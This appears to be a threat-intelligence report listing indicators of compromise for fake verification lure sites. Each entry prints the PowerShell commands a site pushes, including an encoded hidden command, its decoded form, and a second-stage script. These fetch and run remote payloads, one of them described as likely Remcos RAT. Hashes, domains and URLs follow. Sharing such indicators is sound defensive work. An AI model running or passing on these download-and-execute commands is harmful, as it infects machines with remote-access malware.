1] https[:]//human-bot-view[.]chalnlizt[.]org:
[+] PowerShell Command: PowerShell.exe -eC cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBjACAAIgBpAGUAeAAgACgAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYgBjAC4AYQB4AC8AMgA1AFcAZQBMADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACIA
[+] PowerShell Decoded Command: PowerShell -W Hidden -c "iex (iwr https[:]//bc[.]ax/25WeL4 -UseBasicParsing).Content"
[+] 2nd-stage URL: https[:]//bc[.]ax/25WeL4 (the content served at this URL is shown below)
$webClient = New-Object System.Net.WebClient
$url1 = "https[:]//challinksch[.]com/docpzip[.]zip"
$zipPath1 = "$env:TEMP\mfiles.zip"
$webClient.DownloadFile($url1, $zipPath1)
$extractPath1 = "$env:TEMP\mfile"
Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1
Start-Process -FilePath $env:TEMP\mfile\ixploren.exe
[+] IOCs
[-] SHA-256:
4dfd03f81e75f12e8fd5ab2a4cbddc7ee9c695ff271390bad05538e04597b811 - docpzip.zip
08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2 - ixploren.exe (highly likely Remcos RAT)
a6846a51472a6a42a4f2d4cfb4a79980ebe6b01b80da4ac4ca4a5c3fb022be1e - msimg32.dll (suspicious DLL)
[-] Domains:
human-bot-view[.]chalnlizt[.]org
challinksch[.]com
bc[.]ax
[-] URLs:
https[:]//human-bot-view[.]chalnlizt[.]org
https[:]//challinksch[.]com/docpzip[.]zip
https[:]//bc[.]ax/25WeL4

2] https[:]//challinksch[.]com:
[+] PowerShell Command: PowerShell -Command "(New-Object Net.WebClient).DownloadFile('https[:]//the[.]earth[.]li/~sgtatham/putty/latest/w64/putty[.]exe', $env:TEMP + '\CaptionBot.exe'); Start-Process $env:TEMP'\CaptionBot.exe'"
[+] IOCs
[-] Domain: challinksch[.]com
[-] URL: https[:]//challinksch[.]com

3] https[:]//generete-nav-correios[.]space-to-rent[.]com:
[+] PowerShell Command: PowerShell -W Hidden -Command "Invoke-WebRequest -Uri 'http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi' -OutFile $env:TEMP\modecorreiosrastreio.msi; Start-Process $env:TEMP\modecorreiosrastreio.msi"
[+] IOCs
[-] Domain: ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com
[-] IP: 15[.]228[.]128[.]188
[-] URL: http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi